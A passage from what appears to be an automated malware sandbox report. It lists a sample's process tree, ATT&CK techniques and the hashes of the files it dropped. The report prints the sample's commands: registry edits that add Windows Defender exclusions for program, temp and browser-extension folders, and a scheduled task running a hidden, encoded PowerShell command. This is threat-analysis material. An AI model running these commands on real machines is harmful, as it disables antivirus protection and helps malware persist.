Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmanniSeg" /SC once /ST 00:10:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmanniSeg"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3952 -ip 39521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1036 -ip 10361⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
7Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
1.1MB
MD541a62c2991354b73207e66303cf63e17
SHA127f26d0e8259f796b484e52047d5a339e23ff3fe
SHA256676c792c38093bebfecf3455fc6a0a9993e2953f3cd5405520c15ab48a4fd7c6
SHA512551277ee9467e8736323771be70ef00b28dd9686d8165dfc689b34eee57513b3b6dd4f9ac78e057214e4ab7f42c93822ea78b6c2f115c07956d254b0206e7857
-
Filesize
336B
MD50bd8b464dea892eed3aca5c34dd297b4
SHA17ff5bad37e2a21a83c6841838767f8520d50a08f
SHA256e754da89548baba2b360baac4497aa8c590977a7eb44b69cee45adb4d5890781
SHA512680d4f9b638742dda13c0ca701a8ab78251bc09635fceec3f353760aed03688ea0a034ae0bc7c3fddef536a6f5e8468e726cafb0faaab6c63398e36abd6dba2d
-
Filesize
152KB
MD57a91f93305f99435741e609c198be19f
SHA1cf2e6f1ac4cc16731fa02c0f053f3a4222f788c9
SHA25615c7c1ef333c8e7044cdb5c4f214475e4ad43954f7d58b68a0896d9eb718ba83
SHA512e5b0e85f54eff4ddb78a15b77c2ad9294675a40d923f52daa969f3c0d86df9542d9bdc4f07d9fe63a04560241381b65845efd8b07b45ca3cfd7d71a6e53a9561
-
Filesize
20KB
MD5543e573284ed1fcc75eb00870824f4cb
SHA140858f57de21c1b1261e7b9ff484b41db23a1e05
SHA2563d619890b66eed20fa43d6c8d3d6ea4103b3ddd69f592765febec828d5c5f370
SHA5126bcde9b96c49e4025a7e045568384cba010341507efe00f7d6ae6f4924f71c8f7ff5d7cea8d61adca536405a3b4bea3ca632930c10340c7b128b8e3e5d7f5be5
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
524B
MD59c867047e206e0c223f9ce5ca57befe5
SHA18560ff2d05728164e1961269752942f4b4a987ee
SHA2567b15188ec9fdefb1900d84a1263b7019b5436971f8c50191e7204c470045dd17
SHA51223034a8fa8e0291dcf8387d245fd51f01139c9521c8835d47b763ab99cc8699c437095dce8e85a9e5b80959452b6afe968b685918b1d64c75d8b4eb07c4439f9
-
Filesize
7KB
MD583dfe131f170e85e9d83551204d7a83e
SHA14dbc42fa8ea10364a50e7aa75c671f7f511658b9
SHA256b7f95c9e6dfe898f9c5a4941066ebc43dfd3f9f51fe71c3ddcaf40ec47b6134d
SHA512e3f577484eb438120cf639edee9f6f1f4609161a1c9cb631e47600a28a28a97b10f4527e58575dd326a83d1418eb4e9f7e2e083b7f181dbdb6fb9ecf861c51ef
-
Filesize
16KB
MD5ae3ed14f98822baf60e1c60aeb589ab3
SHA1259d90369f5f2e48c9316cb59fe36e19bbdfbd3e
SHA25681bab74f78633140984d0d1520ad0cf26939a254e23c161a977a46c437545427
SHA51227184e694f4576fb0e5efcefe324eb32cc68b4d6e0ac436fbeff3951e52b3ee4c4e1785ad23fc8536b7e77c971d490780fdf7ad0b59fb9e66b66958c37a469a3
-
Filesize
252KB
MD5b9b722f15637a9fb43a2e66ad3bd82ff
SHA10ef0cb4a11dbbefe2f2e70f310be5e8a7559d995
SHA256414ad5a27f3f797d0e099159b5d59ab27751fc7daaa5f9f48932ea9380a27d10
SHA5127d6102c0c7864de7a43f8b0bf9a1f113c9d0a91d8b65cc30c12fa49305ddd656a80199a7615686cef18b11d2b67694092ae3a3c7982c28b553f266dcf1f0f1a8
-
Filesize
2.5MB
MD515d8c8f36cef095a67d156969ecdb896
SHA1a1435deb5866cd341c09e56b65cdda33620fcc95
SHA2561521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a
-
Filesize
103.9MB
MD54936231c48634b100429f03ad2da9441
SHA1ad9d994173ceaf384ce808b12f7d10563ecd8a1d
SHA256c5b7fcc93b1ed8b24f3c7be9d736401f2ac8c5fcaa270092a58d735f5630f3a7
SHA51245c86456b42c64524729a2ad3f2b058eafff733200f376e7e346a84bea9b0e55641dbdb22a7c79622bad1b993a4b7b26e741f6848b61f84382b4e3e464407a66
-
Filesize
2.3MB
MD5d03215bedf861204777e1bbfcd4d0d90
SHA1b429ef5ef909e54fe0d08cc66c0e70eeddeb18ea
SHA2561c330c99687ac4f9a84eefa4110a439bc89575f9bf8fbbfd4e1b7e8845e00797
SHA512b84e7d6746b5fc2bbc569fcf838164a090560eef1dd66dbca2a5040dbc7ae826d3150e103f1c342282327e4b2729583dd801550e6446c0680269e90c6f6a6c20
-
Filesize
1.9MB
MD5494e5a74b19aadb6bb9704071051c12c
SHA1baf176ee78803704ddc98319d2ffd8f46c288b46
SHA2567458c3fdd1d2b52f8c61606bac915f700b8a54aa98f9e245f4f6008b0ca79498
SHA5124826a55342ec35c501a9617d7f91d3f8b405f98e42716cb5bca2fdfa1b860e7f5e849a57d2a5bf51d6b6d635cd1cc2a1f2d4e0778bd895fa932606abd56eff40
-
Filesize
321KB
MD51c7d0f34bb1d85b5d2c01367cc8f62ef
SHA133aedadb5361f1646cffd68791d72ba5f1424114
SHA256e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA51253bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d
-
Filesize
2.7MB
MD531841361be1f3dc6c2ce7756b490bf0f
SHA1ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA51253d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019
-
Filesize
460KB
MD5b22521fb370921bb5d69bf8deecce59e
SHA13d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA5121f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
304KB
MD58510bcf5bc264c70180abe78298e4d5b
SHA12c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA5125ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d
-
Filesize
158KB
MD5586f7fecacd49adab650fae36e2db994
SHA135d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772
-
Filesize
850KB
MD5021b6c96fe692e2bb8d4b0d02e9133b0
SHA14ff05288024aef4f289c22e4e6985f82c29e49d5
SHA256ff477a862bd6e5acebe92887a6f221418da1995dfb0abed8527e21fda9b8950b
SHA512afc29e105225f8f92c74b8ead1df10bedbf6c795cad72c53a6ce6237b71d3f73e346cd6e0116c6a380f7d07e79fa5007e63df8dfe414d0c7816aaf5828cea482
-
Filesize
2.4MB
MD555f780ea4dc5a5401b80915d69a55481
SHA15ebdde7f87637493de0a5e7a4ffcd59839672c4e
SHA256c3014a898f63fab694a759d56bb0b3c979484eedd32708e1467e566b4f3dfa70
SHA512680ca9d6f5aa4d53e7083858bfd4d3fc71f567993968edc83ddf262e15b2ed06f07c5a4c47e65f4874074213adf3cd978b8eaa658563694caf013fb126948697
-
Filesize
476KB
MD5b3dc9fc52e17387fe7473779cda9fe08
SHA17717fef10e5f4e3584c1e0b5c34684e455005b70
SHA2560968642a950d9e72abd3dd209b2afdc1c2da07c581f6c4926d451cc5e44c0df7
SHA5120d0c16d6816708580dc697f219d70697d9e1759da5b72e019b2799d02381b5372628e3ea5e60855abd19eb76308e362341ab52ddbf08b9c707bc9e99abab0f28
-
Filesize
332KB
MD52cb4e769750ceb9a99fcbb4c7e9f8856
SHA194847e14ba3e8c5aa4f117717399be4f5229070e
SHA2565cb8d9d3cd87aa51be2989b76f6ae25a92b6960eb6ff16742958bfbb445c1604
SHA512601d80eafc9135c0deaed00b990cf7b133bbe312c4bcf405934299aafe8f8e8e3f1845225e2d4322ccf9e9dd72f65ca97408e8468bee44b80565330631a062c2
-
Filesize
1.8MB
MD5169d873778a229bcb4f010f87930cb28
SHA115d928181a3abe9fc84d21454246676baad444a8
SHA256f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449
SHA51242630f7e98502c97806a4f241598dba61298d1874bffc7baf1bea34c3950861a182daf6798f4834b4d2865238569379a3bfa796dee953224fc29e712831170c4
-
Filesize
123KB
MD54baee56e1aac1d3870e352cceadf0473
SHA16a5ab179b92428d93d819f7c29790dd5d6808282
SHA256603ef07d3b76075ef8e573da89416496ee0106fdc253e6d69962388ca1419aae
SHA51289fcc0c8d4a6ff8a6f52d566c8651614454ec9b18c207ad3fcdaccae78197da6d27553c37b6474d118b4105b5014c9c3a722c0c1c010d45c5249e709f503dd70
-
Filesize
4.6MB
MD5cb9f8ac8c123de6ef018cd36e39d4a61
SHA130733f7b86743531636affc6e0394f9c3189b3d0
SHA256ea03fe24040a07d65144d51bc06535b2d5104cfc761934e8d2e6c12887f11481
SHA51211d4b2f2eb43258d26dbcb6e0f11a941685491e42eda38a3a628e31d278f346b559f7b407ab658163d01a7576e57a49462b156073c71d8eb6621bf25dbd7b1ae
-
Filesize
8.1MB
MD554d53f5bdb925b3ed005a84b5492447f
SHA1e3f63366d0cc19d48a727abf1954b5fc4e69035a
SHA2564d97e95f172cf1821ec078a6a66d78369b45876abe5e89961e39c5c4e5568d68
SHA512f6a5b88e02e8f4cb45f8aae16a6297d6f0f355a5e5eaf2cbbe7c313009e8778d1a36631122c6d2bcfea4833c2f22dfd488142b6391b9266c32d3205575a8ff72
-
Filesize
1KB
MD55f0adc636e8561d6c61408fd23a0bcda
SHA19d176aecf4c052295a67520946beaf8ffe7ec83b
SHA2567ba859efbf40e0fef9319d68e6cc3fee9358e951fdafda4e408051f18dbc2f5e
SHA5120d1d6edc3bb2f0b4a4d28db4bc10c238d1cf69467145ca452ee0714f5d321b4460b6d5119c90afa338a1072be8dda22c5cf144c58410b4d8d2594f26de0970bb
-
Filesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
Filesize
123KB
MD514621a274d1b87d4c524c19f909a19e9
SHA18ac0c5519bb8fe3d7105eb87a21af21e6932f893
SHA2560c08ba107fad475c0fa85ce041bf75b44e5aa9a2a3fd7b6bb7f10fbd637e6fb2
SHA5120f78dd0effefab5912912105c9c559aa98db7728f61aa0f3eed5247f16023de8fde650bafa2873c036f38339cbe0cbe59987770f2a6f5071fcf29d1ca45c1360
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.4MB
MD59fb4770ced09aae3b437c1c6eb6d7334
SHA1fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256
-
Filesize
6.8MB
MD515fe0c4c282df938f0ae415334fc8d11
SHA10b97fa302ed3f3c2b5dbb2dc8f0386e578ebc14d
SHA256ee44025db5ad03b33944bf734f6f256d8b996e89f2ec22197c1767fbae70853d
SHA512fae66f89bc0007d59570a87ef815295a9499299086bbd2418dd17176c814a9ffc4559fc99b9fa2a1ec14e9d18b4206ce406cc483f04691f3a644cb6a84f932b5
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
46KB
MD58f5942354d3809f865f9767eddf51314
SHA120be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218
-
Filesize
100KB
MD56d242e9151b8b7460c58d840c0c90ac6
SHA11f75ebb9f99c53bcb9c5060d92e8a82930299216
SHA2561fbfa53be1ed175adae59b6d0342c634fc132205ae2d7c449836db65dabebbcd
SHA512071c41f9d928936a635389b0557ef4e94dc639b53586268f78388ec4b8f3cf72f4a569989819d44639ab54129938e4ffd906c42a55235860f583907cda714e10
-
Filesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954
-
Filesize
332KB
MD526ba5a3f20217ea453fa739aa7b13c9f
SHA16075d1e29f4b422334ae6442e73a7f33998e53e2
SHA25648a7ce8f64cfd13089d7b33f663f9729369b5c2c2f82923c329314141bd045c1
SHA512cdad3d3c8a6a6590b99aa44c0ccca99fba82cf2e12ea526d18fef15d88f538b8bccd8688d8c34ab78872de0ed3006c8299fb798d17ff8e70e114385d7ccb5e0e
-
Filesize
109KB
MD5154c3f1334dd435f562672f2664fea6b
SHA151dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA2565f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA5121bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841
-
Filesize
1.2MB
MD5f35b671fda2603ec30ace10946f11a90
SHA1059ad6b06559d4db581b1879e709f32f80850872
SHA25683e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705
-
Filesize
304KB
MD50c582da789c91878ab2f1b12d7461496
SHA1238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a
-
Filesize
750KB
MD520ae0bb07ba77cb3748aa63b6eb51afb
SHA187c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize
4.2MB
MD5c302020dd19613a0a28e2a6b99f5aa6a
SHA113c0e87b9b5c23cdf78295562cd2a52810db3f2f
SHA256bfd67bcdb2e46b4942bb5c0f008df2d23fb7a8ceae1fed7984030548a0fa88d1
SHA51239b5aae54eea389f413631e5f42090c8c76019af3b79a8d823913f2d635ed3727be20741d095d72f5f800646f47753711ec53a6f4c39cfb41ca35fdd16db15a3
-
Filesize
5.1MB
MD5822ef464226e7aa5a5252a7e08d2ec7d
SHA13305e2c8f589802fc48cd46033c7a9f56fca3e60
SHA25627d5aa72c63ebb2c1d4e683b779e3efcd366b5857f60025c4058b01bbef08e90
SHA5120be2e163184971e332386559464cc432a278dadf458d1ade7e5ce6a100beb4fadb2d717eca848658cd35cf0c1335219af7eb9af8c06af390a5795fb9286adcfd
-
Filesize
6.4MB
MD5aaa56797070369ad346fbd9bb6cc5e8b
SHA1a1d01943f0a354d3a000628262671254ca6a91b8
SHA2569d7d08ac35f0113f7c814d257bf88b8222975aaa0a3fdeda88ac7185dbc50905
SHA512e69d25a158567c6bce6e9450de17d0814b9b9c11f4bb31e5dcc3e8b4378062cc7e31da625f6ba4a2280b393034a6c832a0fc0a1e16364dc7e8c8146de245b5be
-
Filesize
4.2MB
MD53953bbad77cdcb9d5af2694eed7e6688
SHA1f965b69eb36d1fbdfb7dfa8c26ba959f395b3223
SHA25662206e7cb02b4fe03c535aa4daaecfa46b42dbd28a756471e50784b7622cecaf
SHA51294a5033ede92683e063829c5a8f2d720c919d1320bf4db18cc9a2e2a69387530b4afacc73cf987695a01c09acba1169eea77a0ff269b41698147cd64e64a7d38
-
Filesize
2KB
